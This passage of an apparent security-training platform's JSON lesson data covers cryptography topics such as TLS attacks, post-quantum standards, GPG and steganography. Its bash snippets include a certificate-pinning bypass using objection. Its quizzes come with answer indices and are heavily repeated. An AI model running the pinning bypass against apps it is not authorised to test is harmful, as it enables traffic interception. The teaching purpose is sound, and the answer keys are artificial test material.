joint analytics, secret sharing\n# Protocols: Shamir's Secret Sharing, Garbled Circuits\n# Libraries: MP-SPDZ, EMP-toolkit"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"MPC allows parties to...","opts":["Share all data","Compute jointly without revealing individual inputs","Encrypt together","Hash together"],"ans":1},{"type":"quiz","q":"Base64 is...","opts":["Encryption","Encoding (not encryption, easily reversed)","Hashing","Compression"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"A certificate authority (CA) does what?","opts":["Hosts websites","Signs digital certificates to verify identity","Encrypts email","Blocks malware"],"ans":1},{"type":"quiz","q":"SHA-256 produces a hash of...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"cr-post-quantum","cat":"Cryptography","title":"Post-Quantum Cryptography Standards","diff":4,"xp":250,"intro":"NIST's new algorithms for the quantum computing era.","sections":[{"type":"text","content":"NIST's new algorithms for the quantum computing era."},{"type":"code","lang":"bash","content":"# ML-KEM (Kyber): lattice-based key encapsulation\n# ML-DSA (Dilithium): lattice-based signatures\n# SLH-DSA (SPHINCS+): hash-based signatures\n# FN-DSA (FALCON): compact lattice signatures"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"NIST selected which algorithm for key exchange?","opts":["RSA-4096","ML-KEM (Kyber)","AES-512","SHA-3"],"ans":1},{"type":"quiz","q":"A timing attack exploits...","opts":["Weak keys","Differences in execution time that leak information","Network latency","CPU bugs"],"ans":1},{"type":"quiz","q":"Base64 is...","opts":["Encryption","Encoding (not encryption, easily reversed)","Hashing","Compression"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"A certificate authority (CA) does what?","opts":["Hosts websites","Signs digital certificates to verify identity","Encrypts email","Blocks malware"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"cr-ssl-tls-attacks","cat":"Cryptography","title":"TLS Attack Catalog","diff":3,"xp":200,"intro":"BEAST, POODLE, CRIME, BREACH, Heartbleed, DROWN.","sections":[{"type":"text","content":"BEAST, POODLE, CRIME, BREACH, Heartbleed, DROWN."},{"type":"code","lang":"bash","content":"# BEAST: CBC IV prediction in TLS 1.0\n# POODLE: SSLv3 padding oracle\n# CRIME/BREACH: compression side-channel\n# Heartbleed: OpenSSL buffer over-read\n# DROWN: SSLv2 cross-protocol\ntestssl.sh target.com"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"Heartbleed was a bug in...","opts":["TLS protocol","OpenSSL implementation","Apache","Windows"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"A certificate authority (CA) does what?","opts":["Hosts websites","Signs digital certificates to verify identity","Encrypts email","Blocks malware"],"ans":1},{"type":"quiz","q":"SHA-256 produces a hash of...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"A timing attack exploits...","opts":["Weak keys","Differences in execution time that leak information","Network latency","CPU bugs"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"cr-cert-pinning","cat":"Cryptography","title":"Certificate Pinning","diff":2,"xp":150,"intro":"Pin the expected certificate to prevent MITM.","sections":[{"type":"text","content":"Pin the expected certificate to prevent MITM."},{"type":"code","lang":"bash","content":"# App hardcodes the expected cert fingerprint\n# Rejects any other cert (even from a trusted CA)\n# Bypass: Frida, objection, or patch the app\nobjection --gadget com.app explore\nandroid sslpinning disable"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"Certificate pinning is bypassed with...","opts":["DNS spoofing","Frida/objection runtime hooks","A valid CA cert","Port forwarding"],"ans":1},{"type":"quiz","q":"Base64 is...","opts":["Encryption","Encoding (not encryption, easily reversed)","Hashing","Compression"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"A certificate authority (CA) does what?","opts":["Hosts websites","Signs digital certificates to verify identity","Encrypts email","Blocks malware"],"ans":1},{"type":"quiz","q":"SHA-256 produces a hash of...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"cr-gpg-advanced","cat":"Cryptography","title":"GPG Advanced Usage","diff":2,"xp":150,"intro":"Key servers, trust model, subkeys, and revocation.","sections":[{"type":"text","content":"Key servers, trust model, subkeys, and revocation."},{"type":"code","lang":"bash","content":"# Upload key to keyserver\ngpg --send-keys KEY_ID\n# Import from keyserver\ngpg --recv-keys KEY_ID\n# Create revocation certificate\ngpg --gen-revoke KEY_ID > revoke.asc\n# Use subkeys (protect master key)\ngpg --edit-key KEY_ID addkey"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"Why use subkeys?","opts":["They're faster","Protect the master key by using separate subkeys for daily operations","They're shorter","They're easier"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"A certificate authority (CA) does what?","opts":["Hosts websites","Signs digital certificates to verify identity","Encrypts email","Blocks malware"],"ans":1},{"type":"quiz","q":"SHA-256 produces a hash of...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"A timing attack exploits...","opts":["Weak keys","Differences in execution time that leak information","Network latency","CPU bugs"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"cr-steganography","cat":"Cryptography","title":"Steganography Techniques","diff":2,"xp":150,"intro":"Hide data inside images, audio, and video files.","sections":[{"type":"text","content":"Hide data inside images, audio, and video files."},{"type":"code","lang":"bash","content":"# Hide data in an image\nsteghide embed -cf image.jpg -ef secret.txt -p password\nsteghide extract -sf image.jpg -p password\n# LSB insertion in PNG\nzsteg image.png\n# Audio steganography\nopenstego embed -mf secret.txt -cf audio.wav -sf stego.wav"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"Steganography hides data by...","opts":["Encrypting files","Embedding data within other files (images, audio)","Deleting files","Compressing files"],"ans":1},{"type":"quiz","q":"Base64 is...","opts":["Encryption","Encoding (not encryption, easily reversed)","Hashing","Compression"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"A certificate authority (CA) does what?","opts":["Hosts websites","Signs digital certificates to verify identity","Encrypts email","Blocks malware"],"ans":1},{"type":"quiz","q":"SHA-256 produces a hash of...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"cr-entropy","cat":"Cryptography","title":"Understanding Entropy","diff":2,"xp":150,"intro":"Measure randomness and unpredictability in data.","sections":[{"type":"text","content":"Measure randomness and unpredictability in data."},{"type":"code","lang":"bash","content":"# High entropy = likely encrypted/compressed\n# Low entropy = readable text/code\npython3 -c 'import math; data=open(\"file\",\"rb\").read(); ent=-sum(c/len(data)*math.log2(c/len(data)) for c in set(data) if c); print(f\"Entropy: {ent:.2f} bits/byte\")'"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"High entropy in a binary suggests...","opts":["Normal code","Encryption or compression","Debug info","Documentation"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"A certificate authority (CA) does what?","opts":["Hosts websites","Signs digital certificates to verify identity","Encrypts email","Blocks malware"],"ans":1},{"type":"quiz","q":"SHA-256 produces a hash of...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"A timing attack exploits...","opts":["Weak keys","Differences in execution time that leak information","Network latency","CPU bugs"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"cr-hash-algorithm-choice","cat":"Cryptography","title":"Choosing the Right Hash Algorithm","diff":1,"xp":75,"intro":"When to use MD5, SHA-256, SHA-3, BLAKE2, or bcrypt.","sections":[{"type":"text","content":"When to use MD5, SHA-256, SHA-3, BLAKE2, or bcrypt."},{"type":"code","lang":"bash","content":"# File integrity: SHA-256 or BLAKE2\n# Password storage: Argon2id, bcrypt, or scrypt\n# Digital signatures: SHA-256 or SHA-3\n# Checksums (non-security): MD5 or CRC32\n# NEVER for passwords: MD5, SHA-1, SHA-256 (too fast)"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"For password storage, use...","opts":["MD5","SHA-256","Argon2id or bcrypt","CRC32"],"ans":2},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short 